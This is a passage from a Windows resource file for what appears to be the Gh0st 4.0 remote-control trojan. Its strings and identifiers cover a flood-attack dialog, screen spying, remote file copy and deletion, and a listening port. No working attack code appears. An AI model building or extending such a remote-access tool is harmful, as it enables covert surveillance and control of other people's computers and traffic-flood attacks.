IDR_WAVE1               WAVE                    "res\\offline.wav"
IDR_WAVE2               WAVE                    "res\\login.wav"

/////////////////////////////////////////////////////////////////////////////
//
// SKIN
//

IDR_SKIN1               SKIN                    "res\\lanse.she"

/////////////////////////////////////////////////////////////////////////////
//
// AFX_DIALOG_LAYOUT
//

IDD_FLOWATTACK_DIALOG AFX_DIALOG_LAYOUT
BEGIN
    0
END


/////////////////////////////////////////////////////////////////////////////
//
// String Table
//

STRINGTABLE
BEGIN
    ID_VIEW_STATUS_BAR      "显示或隐藏状态栏\n显隐状态栏"
    ID_STAUTSTIP            "就绪"
    ID_STAUTSSPEED          "发送: 0.00 kb/s 接收: 0.00 kb/s"
    ID_STAUTSPORT           "端口: 1986"
    ID_STAUTSCOUNT          "连接: 0"
    ID_STAUTSWEICOME        "欢迎使用ghost4.0远程控制"
END

STRINGTABLE
BEGIN
    IDT_LOCAL_PREV          "\n返回上级目录"
    IDT_LOCAL_COPY          "\n拷贝目录到另外的计算机"
    IDT_LOCAL_DELETE        "\n删除文件或目录"
    IDT_LOCAL_VIEW          "\n选择图标模式"
END

STRINGTABLE
BEGIN
    IDT_LOCAL_NEWFOLDER     "\n新建文件"
    IDT_LOCAL_STOP          "\n停止当前操作"
END

STRINGTABLE
BEGIN
    IDT_SCREENSPY           "屏幕监控"
END

#endif    // 中文(简体，中国) resources
/////////////////////////////////////////////////////////////////////////////



#ifndef APSTUDIO_INVOKED
/////////////////////////////////////////////////////////////////////////////
//
// Generated from the TEXTINCLUDE 3 resource.
//
#define _AFX_NO_SPLITTER_RESOURCES
#define _AFX_NO_OLE_RESOURCES
#define _AFX_NO_TRACKER_RESOURCES
#define _AFX_NO_PROPERTY_RESOURCES

#if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_CHS)
#ifdef _WIN32
LANGUAGE 4, 2
#pragma code_page(936)
#endif //_WIN32
#include "res\gh0st.rc2"  // non-Microsoft Visual C++ edited resources
#include "l.chs\afxres.rc"          // Standard components
#endif

/////////////////////////////////////////////////////////////////////////////
#endif    // not APSTUDIO_INVOKED

